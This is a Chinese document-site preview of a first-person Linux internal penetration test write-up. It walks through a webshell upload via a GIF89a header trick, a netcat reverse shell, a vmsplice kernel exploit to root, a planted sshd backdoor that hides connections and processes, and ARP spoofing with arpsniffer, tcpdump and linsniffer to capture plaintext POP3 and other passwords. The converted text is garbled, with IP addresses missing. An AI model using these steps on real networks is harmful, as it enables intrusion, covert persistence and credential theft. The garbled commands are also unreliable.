Linux下ARP欺骗嗅探内部渗透测试_第1页
免费预览已结束,剩余2页可下载查看

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、linux下arp欺骗嗅探内部渗透测试linux下arp哄骗嗅探内部渗透测试 早就跟相关人员说过邮箱认证smtp和pop协议要做加密,否则在公司内网,太简单被人sniffer到明文密码了,另外邮箱密码和公用, bbs也是采纳的http协议,没实用https,这些都是问题。虽然我们控制的网络部分已经做过处理了,ip和mac地址做了绑定,即使有人做arp欺 骗后,除非不出网关,否则哄骗后网络到达不了网关之外,因此嗅探明文邮箱密码已经不行能(因为邮箱服务器不在同一网段)。但是对于我们一些共用资源的服务 器有公网ip和内网ip且处于一个相对风险较高,而且没有按照平安级别举行过相应的平安策略的网络环境内

2、,因此一些问题是自不待言的,但是某些人根本不以 为然。所以我举行了一次容易的内部渗透测试。 首先我从有公网ip和内网ip的网络段入手,如公网ip段是/55,内网ip段/。 经过踩点发觉7(7)上跑了一个老版本的某的。经过检测,存在上传漏洞,利用gif89a文件头哄骗漏洞上传webshell。然后上传个nst。 1: 利用too里面的反弹衔接: 首先在本地用 -l -p 5546监听端口 4: 然后在nst上点back connect 2:(注重红色

3、部分) 胜利登陆 3: 在本地nc的窗口操作: uid=99(nobody) gid=99(nobody) groups=99(nobody) 权限低了点,可以利用前一段时光linux内核vmsplice本地提升权限漏洞。先用nst上传代码: 6:(注重红色部分,上传胜利) 回到nc窗口: in.c /tmp /tmp ls in.c nst_c_bc_c.c sess_af927ee319af5d5569b61ac520e53fcf ssh-zeofp16753 tunl0 gcc -o in in.c ls in in.c nst_c_bc_c.c sess_af927ee319af5d5

4、569b61ac520e53fcf ssh-zeofp16753 tunl0 /tmp/in bash: no job conol in this shell rootbbs111 tmp id uid=0(root) gid=0(root) groups=99(nobody) rootbbs111 tmp 已经是root权限了,下一步上传俺修改过的常用的后门,这个以前写过 一篇文章介绍如何留后门的,这里就不讲述了(替换sshd和部分,可躲藏端口、衔接、文件、进程等)。 擦擦pp,举行下一步我们的重点。 我们还是挺直用后门sshd登录。还是ssh舒适点:) 在securecrt下利用rz指令上

5、传我们用到的arpsniffer.c,然后编译: rootbbs111 root gcc -i/usr/local/include -l/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -et 报错,可能是没装libnet的缘故,看解释make: first you must install pcap and libnet 确定arpsniffer.c需要先装pcap和 libnet。 rootbbs111 root rpm -ivh libnet--2.1.fc2.rf.i386.rpm rootbbs111 root wget

6、rootbbs111 root tar zxvf libpcap-0.8.1.tar.gz rootbbs111 root cd libpcap-0.8.1 rootbbs111 libpcap-0.8.1 ./configure rootbbs111 libpcap-0.8.1 make rootbbs111 libpcap-0.8.1 make install 预备工作已经ok。下面重新编译arpsniffer.c rootbbs111 root gcc -i/usr/local/include -l/usr/local/lib -o arpsniffer arpsniffer.c -lp

7、cap -lnet 这次没报错,编译胜利。 rootbbs111 root ./arpsniffer = =arp sniffer= =write by paris-ye= =usage: ./arpsniffer -i interface -m self ip -w workion ip -s server ip -p port =for ample: ./arpsniffer -i eth0 -m -w -s 54 下面开头哄骗,因为是服务器端,因此我们哄骗网关:(网络环境如下,邮件服务器ip:1

8、网关: 本机:7) rootbbs111 root ./arpsniffer -i eth0 -m 7 -w -s 1 -p 110 110 110 get network cards mac aress: m- 00:0e:a6:a5:80:4f w- 00:0f:e2:23:05:d0 s- 00:d0:b7:88:07:59 now start. . . 在另一个登录里面用监听下: rootbbs111 root tcpdump -i eth0 host

9、1 发觉有数据,把监听的数据存在文件里面: rootbbs111 root tcpdump -i eth0 host 2 -w pop.txt 10分钟后停止,在securecrt下用sz指令下载pop.txt到本地,然后用ethereal分析。果真发觉明文用户名和密码。 下面我们就可以用linsniffer监听我们想要的用户名和密码了。 先修改linsniffer.c:按照自己的需求监听相应的应用密码。我的如下: if(ntohs(tcp- dest)=21) p=1; /* */ if(ntohs(tcp- dest)=22) p=1; /* ssh for compa

10、rison add for example only comment out if desired*/ if(ntohs(tcp- dest)=23) p=1; /* */ if(ntohs(tcp- dest)=80) p=1; /* http */ if(ntohs(tcp- dest)=110) p=1; /* pop3 */ if(ntohs(tcp- dest)=513) p=1; /* rlogin */ if(ntohs(tcp- dest)=106) p=1; /* pop */ rootbbs111 root gcc -o linsniffer linsniffer.c in included from /usr/include/linux/tcp.h:21, from linsniffer.c:32: /usr/include/asm/byteorder.h:6:2: warning: warning using private kernel header; include endian.h instead! 不用管警告,挺直运行编译后的linsniffer即可。 rootbbs111 root ./linsniffer

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论